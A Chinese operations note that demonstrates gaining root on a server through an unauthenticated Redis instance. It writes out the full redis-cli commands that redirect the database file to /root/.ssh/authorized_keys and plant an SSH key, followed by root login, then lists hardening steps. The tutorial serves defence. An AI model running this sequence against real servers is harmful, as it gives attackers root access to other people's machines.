5. redis安全第一步 · 運維工作筆記

描述：我們來模擬一下，首先會使用端口掃描工具來掃描公網上開放的6379端口，假設我們掃描到10.10.20.17的6379端口對外網開放了（10.10.20.17當做公網IP）,并且redis沒有設置認證。我使用的是 3.0.6版本默認配置文件（沒有bind ip的） ![利用Redis獲取到服務器權限](https://s4.51cto.com/images/blog/202007/30/d987ca846452b35821b50fd6b850ec4e.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=) ### 1、直接連上去本地安裝redis服務就可直接連接到遠程redis服務。 ~~~ [root@20centos ~]# /home/jia/redis-3.0.6/src/redis-cli -h 10.10.20.17 -p 6379 10.10.20.17:6379> config get dir #查看數據保存目錄 1) "dir" 2) "/root" 10.10.20.17:6379> config set dir "/root/.ssh" #修改數據保存目錄 OK 10.10.20.17:6379> config get dir 1) "dir" 2) "/root/.ssh" 10.10.20.17:6379> CONFIG GET dbfilename #查看保存的文件名 1) "dbfilename" 2) "dump.rdb" 10.10.20.17:6379> config set dbfilename "authorized_keys" #修改保存文件名稱 OK 10.10.20.17:6379> CONFIG GET dbfilename 1) "dbfilename" 2) "authorized_keys" 10.10.20.17:6379> ~~~ ### 2、將本地公鑰寫到redis ~~~ [root@20centos ~]# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: SHA256:d/MJ73LKzrJtFfcxaXYX0q38rXhxSJOvftoDCpHoPmY root@VM_20_26_centos The key's randomart image is: +---[RSA 2048]----+ | . .| | . o.| | . . ..oo| | . o B*+| | . S o +.oBB| | . o . *+.*| | . . .o== | | E .=+.=o.| | o . .=**+oo| +----[SHA256]-----+ [root@VM_20_26_centos ~]# cd /root/.ssh/ [root@VM_20_26_centos .ssh]# ll total 12 -rw-r--r-- 1 root root 862 Jul 29 13:46 authorized_keys -rw------- 1 root root 1675 Jul 30 14:14 id_rsa -rw-r--r-- 1 root root 402 Jul 30 14:14 id_rsa.pub [root@20centos .ssh]# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> haha.txt #公鑰key文件寫入txt（我的key刪了一些僅供參考就可以） [root@20centos .ssh]# cat haha.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC04dqTbzUAuWZbrPLwxswapVEkWdPmWKZycT55B2I68UNDNNP3EiBKHvwd5xqZ+Pm/Boykdf4YaEOhSujdsaal/FDmMWKRnbX root@20centos [root@20centos .ssh]# cat haha.txt | /root/redis-3.0.6/src/redis-cli -h 10.10.20.17 -p 6379 -x set haha ##寫入到redis OK [root@20centos .ssh]# /root/redis-3.0.6/src/redis-cli -h 10.10.20.17 -p 6379 10.10.20.17:6379> save #保存到本地 OK 10.10.20.17:6379> exit ~~~ ### 3、ssh嘗試連接服務器 ~~~ [root@VM20centos .ssh]# ssh root@10.10.20.17 Last login: Thu Jul 30 14:08:49 2020 [root@17centos ~]# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.20.17 netmask 255.255.255.0 broadcast 10.10.20.255 ether 52:54:00:ba:b0:f1 txqueuelen 1000 (Ethernet) RX packets 653658 bytes 184065832 (175.5 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 566326 bytes 81215612 (77.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 143290 bytes 7086525165 (6.5 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 143290 bytes 7086525165 (6.5 GiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ~~~ ### **本章模擬了，通過redis獲取到服務器權限，希望大家不要去掃描、嘗試登陸其他人的服務器。** ### 生產環境redis安全在新的版本中redis配置文件默認”bind 127.0.0.1“，需要我修改為內網ip，本機訪問可以不修改， > 不使用默認端口 > 配置文件bind 內網ip地址 > 添加密碼認證 > 不使用root用戶啟動，專用用戶 > 防火墻限制外網訪問